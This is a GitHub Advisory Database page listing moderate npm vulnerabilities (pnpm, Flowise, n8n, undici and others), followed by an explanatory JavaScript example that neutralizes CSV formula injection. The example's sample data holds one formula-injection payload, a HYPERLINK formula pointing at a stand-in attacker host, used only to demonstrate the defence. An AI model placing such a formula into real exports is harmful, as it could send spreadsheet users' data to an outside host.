
GitHub Advisory Database

Security vulnerability database inclusive of CVEs and GitHub originated security advisories from the world of open source software.

2,345 advisories

Turbo: Login callback CSRF/session fixation Moderate
CVE-2026-45773 was published for turbo (npm) May 19, 2026
Credited to DanStuartDept, jpleyden98, and ToshB
JS-YAML: Quadratic-complexity DoS in merge key handling via repeated aliases Moderate
CVE-2026-53550 was published for js-yaml (npm) Jun 15, 2026
Credited to 0xbughunter, soren121, mazze93, G-Rath, dargmuesli, and omgovich
pnpm: Reserved bin name deletes PNPM_HOME during global remove Moderate
CVE-2026-55699 was published for pnpm (npm) Jun 26, 2026
Credited to mldangelo-oai
pnpm binds unscoped user-level npm auth credentials to a repository-selected registry Moderate
CVE-2026-50017 was published for pnpm (npm) Jun 26, 2026
Credited to mosskappa
pnpm: Git Fetch Argument Injection via Lockfile resolution.commit Moderate
CVE-2026-50014 was published for pnpm (npm) Jun 26, 2026
Credited to tempcollab
pnpm Has an Integrity Check Bypass via Missing Lockfile Integrity Field Moderate
CVE-2026-50021 was published for pnpm (npm) Jun 26, 2026
Credited to tempcollab
pnpm: Unsafe default behavior breaks integrity check Moderate
CVE-2026-50573 was published for pnpm (npm) Jun 26, 2026
Credited to aszx87410
js-toml has silent type confusion via falsy-primitive duplicate-key bypass Moderate
CVE-2026-50029 was published for js-toml (npm) Jun 26, 2026
Credited to CosmicCrusader23
@microsoft/kiota-http-fetchlibrary: Bearer token and Cookie leak across origin on redirect due to case-mismatched scrub in fetchRequestAdapter Moderate
CVE-2026-49336 was published for @microsoft/kiota-http-fetchlibrary (npm) Jun 26, 2026
Credited to tonghuaroot, baywet, and adrian05-ms
pnpm: Tarball hash of GitHub git dependencies is not stored in lockfile Moderate
CVE-2026-48995 was published for pnpm (npm) Jun 26, 2026
Credited to dsherret
MJML allows mj-include directory traversal due to an incomplete fix for CVE-2020-12827 Moderate
CVE-2025-67898 was published for mjml (npm) Dec 15, 2025
Credited to LambArchie
@cyclonedx/cdxgen: Maven project scanning may allow shell command injection through repository-controlled module paths Moderate
GHSA-5vwr-qchf-q4pf was published for @cyclonedx/cdxgen (npm) Jun 26, 2026
Credited to aleff-github
@sigstore/core has DSSE payloadType type-binding failure Moderate
CVE-2026-48758 was published for @sigstore/core (npm) Jun 26, 2026
Credited to Str1ckl4nd and Zyy0530
undici vulnerable to cross-user information disclosure via shared cache whitespace bypass Moderate
CVE-2026-9678 was published for undici (npm) Jun 18, 2026
Credited to AndrewMohawk, mcollina, and UlisesGascon
hono Improperly Handles JSX Attribute Names Allows HTML Injection in hono/jsx SSR Moderate
CVE-2026-56761 was published for hono (npm) Apr 16, 2026
Credited to tndud042713 and throwersedrickoctauious-del
n8n has a Stored XSS Vulnerability in its Form Trigger Moderate
CVE-2026-56358 was published for n8n (npm) Mar 27, 2026
Credited to tr4ce-ju
n8n: SQL Injection in MySQL, PostgreSQL, and Microsoft SQL nodes Moderate
CVE-2026-56351 was published for n8n (npm) Feb 26, 2026
Flowise has Insufficient Password Salt Rounds Moderate
CVE-2026-56272 was published for flowise (npm) Mar 5, 2026
Credited to kolega-ai-dev
Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request Moderate
CVE-2026-56270 was published for flowise (npm) Apr 16, 2026
Credited to berkdedekarginoglu
Flowise: Weak Default Token Hash Secret Moderate
CVE-2026-56269 was published for flowise (npm) Apr 16, 2026
Credited to kolega-ai-dev
FlowiseDB vulnerable to SQL Injection by authenticated users Moderate
CVE-2025-71332 was published for flowise (npm) Apr 7, 2025
Credited to Tribal1012
http-proxy-middleware `router` host+path substring matching allows Host-header-driven backend routing bypass Moderate
CVE-2026-55602 was published for http-proxy-middleware (npm) Jun 18, 2026
Credited to Str1ckl4nd, Zyy0530, 7thParkk, G-Rath, and ethantkoenig
@actual-app/web has CSV Formula Injection in Transaction Export via Imported Payee/Notes Fields Moderate
CVE-2026-50179 was published for @actual-app/web (npm) Jun 22, 2026
Credited to offset and MatissJanis
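The CSV formula-injection entry above is about user-controlled text (imported payee and notes fields) reaching a spreadsheet export unneutralized. The block below is an added example, not @actual-app/web's code or anything taken from the advisory, showing the generic defence: a text cell that starts with a formula trigger character (=, +, -, @, tab, carriage return, optionally after leading spaces) is prefixed with a single quote so spreadsheets read it as text, and every cell is then RFC 4180 quoted so commas, quotes and newlines cannot break the row. Numeric fields are emitted verbatim, since a JavaScript number cannot carry a formula and quoting a negative amount would break the column. The transaction shape and the sample rows are constructed for the example.

```javascript
// Added example (not @actual-app/web code): neutralize spreadsheet formula
// injection when exporting user-controlled text fields to CSV.

// Characters that Excel, LibreOffice and Google Sheets treat as the start
// of a formula or a DDE-style expression.
const FORMULA_TRIGGERS = new Set(['=', '+', '-', '@', '\t', '\r']);

// A string is formula-like when its first character after any leading
// spaces is a trigger. Leading spaces are skipped because some spreadsheet
// importers trim them before deciding whether a cell is a formula.
function isFormulaLike(value) {
  const firstNonSpace = String(value).replace(/^ +/, '').charAt(0);
  return FORMULA_TRIGGERS.has(firstNonSpace);
}

// Render one cell. Numbers pass through untouched (they cannot carry a
// formula, and quoting "-12.5" would turn an amount into text). Text that
// looks like a formula gets a leading apostrophe, then RFC 4180 quoting
// protects the row structure against embedded delimiters and quotes.
function csvCell(value) {
  if (typeof value === 'number') return String(value);
  let s = value == null ? '' : String(value);
  if (isFormulaLike(s)) s = "'" + s;
  if (/[",\r\n]/.test(s)) s = '"' + s.replace(/"/g, '""') + '"';
  return s;
}

function csvRow(values) {
  return values.map(csvCell).join(',');
}

// Export a list of { date, payee, notes, amount } records (hypothetical shape).
function exportTransactions(transactions) {
  const header = csvRow(['date', 'payee', 'notes', 'amount']);
  const rows = transactions.map(t => csvRow([t.date, t.payee, t.notes, t.amount]));
  return [header, ...rows].join('\r\n');
}

// Constructed sample: an imported payee carrying a hyperlink formula, and a
// note that merely starts with "+" but would still be evaluated as a formula.
const SAMPLE_TRANSACTIONS = [
  { date: '2026-06-22', payee: '=HYPERLINK("http://attacker.example/?x")', notes: 'lunch', amount: -12.5 },
  { date: '2026-06-23', payee: 'ACME, Inc.', notes: '+1 guest', amount: -30 },
];

// Stand-alone run: prints the neutralized export.
console.log(exportTransactions(SAMPLE_TRANSACTIONS));
```

Prefixing with an apostrophe changes the exported text, which is the accepted trade-off: a consumer that needs the original payee string must read it from the application's API or database, not from a file whose purpose is to be opened in a spreadsheet.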